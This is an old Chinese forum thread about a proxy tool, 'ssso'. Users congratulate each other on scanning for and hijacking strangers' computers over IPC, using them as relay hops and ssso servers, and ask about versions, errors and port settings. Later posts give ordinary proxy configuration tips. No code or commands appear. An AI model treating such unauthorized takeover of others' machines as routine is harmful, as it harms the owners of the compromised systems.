您是本帖的第 174 个阅读者
* 贴子主题： 终于做出了一个ssso!
刘文正 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：31
积分：69
注册：2002-11-29
楼顶
发贴心情 终于做出了一个ssso!
我在2000里，用ssso stool37里的 ipc扫到3个肉鸡.
用ssso stool37里的ssso-friend 1.5做这2个肉鸡，一个只做成了跳板；另一个运气好，跳板和ssso都成了！太好了！
非常感谢各位大侠的帮助和鼓励！
我用的ssso v27.
2002-12-2 6:25:08
编辑这个贴子 鲜花(0) 鸡蛋(0)
刘文正 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：31
积分：69
注册：2002-11-29
第2楼
发贴心情
另想问问大侠：
是否有必要把ssso 27 换成 ssso 36; ssso stool37 换成 ssso stool40?
2002-12-2 6:28:44
编辑这个贴子
刘文正 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：31
积分：69
注册：2002-11-29
第3楼
发贴心情
在做ipc连接时出现：

系统发生53错误，找不到网络路径

是什么回是事呀？

2002-12-2 6:40:02
编辑这个贴子
summer 美女呀，离线，快来找我吧！

等级：版主
文章：20
积分：50
注册：2002-11-15
第4楼
发贴心情
放弃！
2002-12-2 7:41:45
编辑这个贴子
5000 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：23
积分：125
注册：2002-11-4
第5楼
发贴心情
恭喜你呀！终于成功了，可惜我的硬件不行要不我也作几个ssso服务器。
2002-12-2 12:20:42
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：247
积分：448
注册：2002-10-27
第6楼
发贴心情
换吧，新的要好一点，如果不用跳板的话
2002-12-2 13:03:41
编辑这个贴子
masterzo 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：20
积分：59
注册：2002-11-26
第7楼
发贴心情
恭喜你！可怜我至今找不到一个肉鸡,唉！看样子要装win2000。
我的系统是WIN98和winXP,如再装win2000又怕多重启动菜单损坏，有这方面经验的朋友请告诉一声.
2002-12-2 13:26:26
编辑这个贴子
刘文正 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：31
积分：69
注册：2002-11-29
第8楼
发贴心情
非常感谢大家！
尤其是summer,asd,no 1 ,jsd等人，summer鼓励了我几次！
当然还有白云，乐助！！！！！！！！！！！！！！
哈哈！
jzx ，你建议我全换掉吗？
masterzo，做,用跳板和ssso，我认为2000是最好的。所以我建议你再加个2000！！！
5000 ，谢谢！
我以前在清舟那里下ssso27,只会用。
这次多亏有乐助朋友发明的ssso friend，这个东东太厉害了，非常傻瓜，哈哈！
当然还有ssso的白云！！！！！！！！！！！！！！！！！！
2002-12-2 19:42:35
编辑这个贴子
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：19
积分：51
注册：2002-10-25
第9楼

以下是引用masterzo在2002-12-2 13:26:26的发言：
恭喜你！可怜我至今找不到一个肉鸡,唉！看样子要装win2000。
我的系统是WIN98和winXP,如再装win2000又怕多重启动菜单损坏，有这方面经验的朋友请告诉一声.

winxp可以啊，我第一次做就做成功四个。不过也许我的运气好，网段选得正确。

2002-12-2 20:30:33
编辑这个贴子


请问ssso的本地端口怎么改?
星星
请问ssso的本地端口怎么改?就是1913的那个.
MYSSSO回复：在 CHANGE PROXY 里 先该了, 随便用一个端口 (别和已经运行的冲突就可以)，
然后, 相应地 在 SOCKSCAP CONTROL 程序里 的 SETTING 设置里, SOCKS SERVER 的端口里填写 刚才修改后的端口数据, 和CHANGE PROXY里的 端口一定保持一样.
大兰 我改了ssso的端口,成功了.可 傻 瓜 跳 板不能用了.请问傻 瓜 跳 板再怎么改?
回复1：我也碰到过，后来，我在snake的配置中点运行选项-服务运行端口改，改完后一定要保存，否则改不了。
回复2：它们都需要和sockscap中的设置匹配，而即使安装两个sockscap也是一个设置。不过也很好解决，看你想干什么了。
回复3：古风：说得清楚点。是本机还是服务器？
[转]在SocksCap中，只要两个不同时运行就可以，因为他们占用相同的端口。


手动修改FREESURF的显示名称

→ 浏览：在几种软件中使用FLATSURFER。

发贴心情 在几种软件中使用FLATSURFER
1、在CUTEFTP中使用FLATSURFER时，要将其设置成SOCKS5，设置成HTTP代理不能连通，（另外，该软件不能作为FTP代理使用）。
2、在FOXMAIL中使用时要设置在短信代理服务器HTTP　PROXY一项上，设置成SOCKS5不能连通。
3、在flashget中设置成http或socks代理均可。
补充：myie当然可以用了,你点-----选项------快速代理设置--------新增--------输入127.0.0.1:端口号,此处端口号是你服务器上所开的端口号-------保存后----------使用该代理服务器.